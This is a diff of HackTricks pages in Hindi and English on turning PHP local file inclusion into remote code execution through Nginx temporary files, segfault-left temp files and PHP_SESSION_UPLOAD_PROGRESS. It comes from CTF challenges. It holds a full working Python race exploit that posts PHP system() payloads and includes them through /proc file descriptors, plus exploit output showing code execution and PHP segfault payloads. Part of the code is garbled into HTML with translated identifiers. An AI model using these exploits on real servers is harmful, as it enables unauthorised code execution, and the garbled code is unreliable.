5. **Achieve Remote Code Execution**: Once the PHP shell is triggered, you have successfully achieved Remote Code Execution on the server.
|
||||
|
||||
#### Conclusion
|
||||
|
||||
By leveraging an LFI vulnerability in combination with Nginx temporary files, an attacker can escalate their access and execute arbitrary code on the target system. It is crucial for system administrators to secure their applications and servers to prevent such attacks.
|
||||
```
|
||||
$ ./pwn.py 127.0.0.1 1337
|
||||
[*] cpus: 2; pid_max: 32768
|
||||
[*] nginx worker found: 33
|
||||
[*] nginx worker found: 34
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] starting uploader
|
||||
[+] brute loop restarted: 33
|
||||
[+] brute loop restarted: 34
|
||||
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
```
|
||||
### एक और दुरुपयोग
|
||||
|
||||
यह [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/) से है।
|
||||
```python
|
||||
import requests
|
||||
import threading
|
||||
import multiprocessing
|
||||
import threading
|
||||
import random
|
||||
|
||||
SERVER = "http://localhost:8088"
|
||||
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
|
||||
# Set the following to True to use the above set of PIDs instead of scanning:
|
||||
USE_NGINX_PIDS_CACHE = False
|
||||
|
||||
def create_requests_session():
|
||||
session = requests.Session()
|
||||
# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
|
||||
adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
|
||||
session.mount('http://', adapter)
|
||||
return session
|
||||
|
||||
def get_nginx_pids(requests_session):
|
||||
if USE_NGINX_PIDS_CACHE:
|
||||
return NGINX_PIDS_CACHE
|
||||
nginx_pids = set()
|
||||
# Scan up to PID 200
|
||||
for i in range(1, 200):
|
||||
cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
|
||||
if cmdline.startswith("nginx: worker process"):
|
||||
nginx_pids.add(i)
|
||||
return nginx_pids
|
||||
|
||||
def send_payload(requests_session, body_size=1024000):
|
||||
try:
|
||||
# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
|
||||
payload = '<?php system("/readflag"); ?> //'
|
||||
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
|
||||
except:
|
||||
pass
|
||||
|
||||
def send_payload_worker(requests_session):
|
||||
while True:
|
||||
send_payload(requests_session)
|
||||
|
||||
def send_payload_multiprocess(requests_session):
|
||||
# Use all CPUs to send the payload as request body for Nginx
|
||||
for _ in range(multiprocessing.cpu_count()):
|
||||
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
|
||||
p.start()
|
||||
|
||||
def generate_random_path_prefix(nginx_pids):
|
||||
# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
|
||||
path = ""
|
||||
component_num = random.randint(0, 10)
|
||||
for _ in range(component_num):
|
||||
pid = random.choice(nginx_pids)
|
||||
if random.randint(0, 1) == 0:
|
||||
path += f"/proc/{pid}/cwd"
|
||||
else:
|
||||
path += f"/proc/{pid}/root"
|
||||
return path
|
||||
|
||||
def read_file(requests_session, nginx_pid, fd, nginx_pids):
|
||||
nginx_pid_list = list(nginx_pids)
|
||||
while True:
|
||||
path = generate_random_path_prefix(nginx_pid_list)
|
||||
path += f"/proc/{nginx_pid}/fd/{fd}"
|
||||
try:
|
||||
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
|
||||
except:
|
||||
continue
|
||||
# Flags are formatted as hxp{<flag>}
|
||||
if "hxp" in d:
|
||||
print("Found flag! ")
|
||||
print(d)
|
||||
|
||||
def read_file_worker(requests_session, nginx_pid, nginx_pids):
|
||||
# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
|
||||
for fd in range(10, 45):
|
||||
thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
|
||||
thread.start()
|
||||
|
||||
def read_file_multiprocess(requests_session, nginx_pids):
|
||||
for nginx_pid in nginx_pids:
|
||||
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
|
||||
p.start()
|
||||
|
||||
if __name__ == "__main__":
|
||||
print('[DEBUG] Creating requests session')
|
||||
requests_session = create_requests_session()
|
||||
print('[DEBUG] Getting Nginx pids')
|
||||
nginx_pids = get_nginx_pids(requests_session)
|
||||
print(f'[DEBUG] Nginx pids: {nginx_pids}')
|
||||
print('[DEBUG] Starting payload sending')
|
||||
send_payload_multiprocess(requests_session)
|
||||
print('[DEBUG] Starting fd readers')
|
||||
read_file_multiprocess(requests_session, nginx_pids)
|
||||
```
|
||||
## प्रयोगशालाएं
|
||||
```html
|
||||
<h2>भेजें_पेलोड_कार्यकर्ता(अनुरोध_सत्र):</h2>
|
||||
|
||||
<p>जब तक: भेजें_पेलोड(अनुरोध_सत्र)</p>
|
||||
|
||||
<h2>भेजें_पेलोड_बहुप्रक्रिया(अनुरोध_सत्र):</h2>
|
||||
|
||||
<p># सभी सीपीयू का उपयोग करें ताकि Nginx के लिए अनुरोध शरीर के रूप में पेलोड भेजा जा सके</p>
|
||||
|
||||
<p>के लिए \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=भेजें_पेलोड_कार्यकर्ता, args=(अनुरोध_सत्र,)) p.start()</p>
|
||||
|
||||
<h2>यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pids):</h2>
|
||||
|
||||
<p># यह विधि यादृच्छिक संख्या के ProcFS पथ घटकों से एक पथ बनाती है। एक उत्पन्न पथ इस प्रकार दिखेगा /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path</p>
|
||||
|
||||
<h2>फ़ाइल_पढ़ें(अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids):</h2>
|
||||
|
||||
<p>nginx\_pid\_सूची = list(nginx\_pids) while True: path = यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pid\_सूची) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # ध्वज हेक्सपी{} के रूप में स्वरूपित होते हैं अगर "hxp" में d है: print("ध्वज पाया गया! ") print(d)</p>
|
||||
|
||||
<h2>फ़ाइल_पढ़ें_कार्यकर्ता(अनुरोध_सत्र, nginx\_pid, nginx\_pids):</h2>
|
||||
|
||||
<p># एक लूप में 10 - 45 के बीच Nginx FDs स्कैन करें। क्योंकि फ़ाइलें और सॉकेट बंद होते रहते हैं - यह अनुरोध शरीर FD को इस सीमा के भीतर खोलना बहुत सामान्य है जिसके लिए fd in range(10, 45): thread = threading.Thread(target = फ़ाइल_पढ़ें, args = (अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids)) thread.start()</p>
|
||||
|
||||
<h2>फ़ाइल_पढ़ें_बहुप्रक्रिया(अनुरोध_सत्र, nginx\_pids):</h2>
|
||||
|
||||
<p>के लिए nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=फ़ाइल_पढ़ें_कार्यकर्ता, args=(अनुरोध_सत्र, nginx\_pid, nginx\_pids)) p.start()</p>
|
||||
|
||||
<p>यदि **नाम** == "**मुख्य**": print('\[DEBUG] अनुरोध सत्र बनाना') requests\_session = create\_requests\_session() print('\[DEBUG] Nginx pids प्राप्त करना') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] पेलोड भेजना शुरू करना') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] fd पठक पढ़ना शुरू करना') read\_file\_multiprocess(requests\_session, nginx\_pids)</p>
|
||||
```
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
|
||||
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
|
||||
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
|
||||
|
||||
## संदर्भ
|
||||
## References
|
||||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||
|
||||
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||
|
||||
You can check their website and try their engine for **free** at:
|
||||
|
||||
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
|
||||
|
||||
{% hint style="success" %}
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```
|
||||
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
# LFI2RCE के माध्यम से सेगमेंटेशन फॉल्ट
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
वाइटअप्स [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) के अनुसार, निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया:
|
||||
लेखन के अनुसार [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया:
|
||||
```php
|
||||
// PHP 7.0
|
||||
include("php://filter/string.strip_tags/resource=/etc/passwd");
|
||||
|
@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
|
|||
// PHP 7.2
|
||||
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
|
||||
```
|
||||
आपको यह जानना चाहिए कि अगर आप **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** हो, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php<something>`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रसंस्कृत हो जाए।
|
||||
आपको यह जानना चाहिए कि अगर आप एक **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** होती है, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php<something>`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रोसेस हो जाने के बाद।
|
||||
|
||||
अगर आपको **LFI** मिलता है और आप PHP में **सेगमेंटेशन फॉल्ट को ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप इसे **LFI** भेद्यता के साथ खोज सकते हैं जब तक आप इसे नहीं मिलता और विचारात्मक कोड को क्रियान्वित कर सकते हैं।
|
||||
अगर आपको एक **LFI** मिल जाता है और आप PHP में **सेगमेंटेशन फॉल्ट** को **ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप उसे **LFI** जोख सकते हैं तकि आप उसे खोज सकें और विचारात्मक कोड का निषेध कर सकें।
|
||||
|
||||
आप [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) का उपयोग परीक्षण के लिए कर सकते हैं।
|
||||
```python
|
||||
|
@ -69,16 +70,17 @@ bruteforce(charset)
|
|||
if __name__ == "__main__":
|
||||
main()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम ग्रुप**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# LFI2RCE के माध्यम से PHP\_SESSION\_UPLOAD\_PROGRESS
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर** सबमिट करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## मूल जानकारी
|
||||
|
||||
अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **मल्टीपार्ट POST** डेटा में **`PHP_SESSION_UPLOAD_PROGRESS`** प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा**।
|
||||
अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **`PHP_SESSION_UPLOAD_PROGRESS`** को **मल्टीपार्ट POST** डेटा में प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा**।
|
||||
```bash
|
||||
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
|
||||
$ ls -a /var/lib/php/sessions/
|
||||
|
@ -30,19 +31,19 @@ $ ls -a /var/lib/php/sessions/
|
|||
|
||||
In the last example the session will contain the string blahblahblah
|
||||
```
|
||||
सावधान रहें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)।
|
||||
नोट करें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)।
|
||||
|
||||
{% hint style="info" %}
|
||||
हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग के उद्देश्य से `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा।
|
||||
हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग उद्देश्य के लिए `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा।
|
||||
{% endhint %}
|
||||
|
||||
### CTF
|
||||
### सीटीएफ
|
||||
|
||||
[**मूल CTF**](https://blog.orange.tw/2018/10/) में जहाँ इस तकनीक पर टिप्पणी की गई है, वहाँ रेस कंडीशन का शोषण करना पर्याप्त नहीं था बल्कि लोड किया गया सामग्री भी `@<?php` स्ट्रिंग के साथ शुरू होनी चाहिए थी।
|
||||
[**मूल CTF**](https://blog.orange.tw/2018/10/) में जहां इस तकनीक पर टिप्पणी की गई है, वहां रेस कंडीशन का शोषण करना पर्याप्त नहीं था बल्कि लोड किया गया सामग्री भी `@<?php` स्ट्रिंग के साथ शुरू होनी चाहिए थी।
|
||||
|
||||
`session.upload_progress.prefix` की डिफ़ॉल्ट सेटिंग के कारण, हमारी **सत्र फ़ाइल एक परेशान करने वाला उपसर्ग से शुरू होगी** `upload_progress_` जैसे: `upload_progress_controlledcontentbyattacker`
|
||||
|
||||
**आरंभिक उपसर्ग को हटाने** का तरीका था **पेयलोड को 3 बार base64encode करना** और फिर `convert.base64-decode` फ़िल्टर के माध्यम से इसे डिकोड करना, यह इसलिए क्योंकि **जब भी base64 डिकोड होता है तो PHP अजीब वर्ण हटा देगा**, इसलिए 3 बार के बाद **केवल** हमें आक्रमणकर्ता द्वारा **भेजा गया पेयलोड ही बचेगा** (और फिर आक्रमणकर्ता आरंभिक हिस्से को नियंत्रित कर सकता है)।
|
||||
**आदि उपसर्ग को हटाने** का तरीका **पेयलोड को 3 बार base64encode करना** था और फिर `convert.base64-decode` फ़िल्टर के माध्यम से इसे डिकोड करना था, यह इसलिए क्योंकि **जब भी base64 डिकोडिंग होगी तो PHP अजीब वर्ण हटा देगा**, इसलिए 3 बार के बाद **केवल** हमें अटैकर द्वारा **भेजा गया पेयलोड ही बचेगा** (और फिर अटैकर प्रारंभिक हिस्से को नियंत्रित कर सकेगा)।
|
||||
|
||||
अधिक जानकारी के लिए मूल लेख में जाएं [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) और अंतिम शोषण [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\
|
||||
मूल लेख में अधिक जानकारी [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) और अंतिम शोषण [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py)\
|
||||
एक और लेख में [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
|
||||
|
|
|
@ -1,31 +1,33 @@
|
|||
# ब्राउज़र HTTP रिक्वेस्ट स्मगलिंग
|
||||
|
||||
{% hint style="success" %}
|
||||
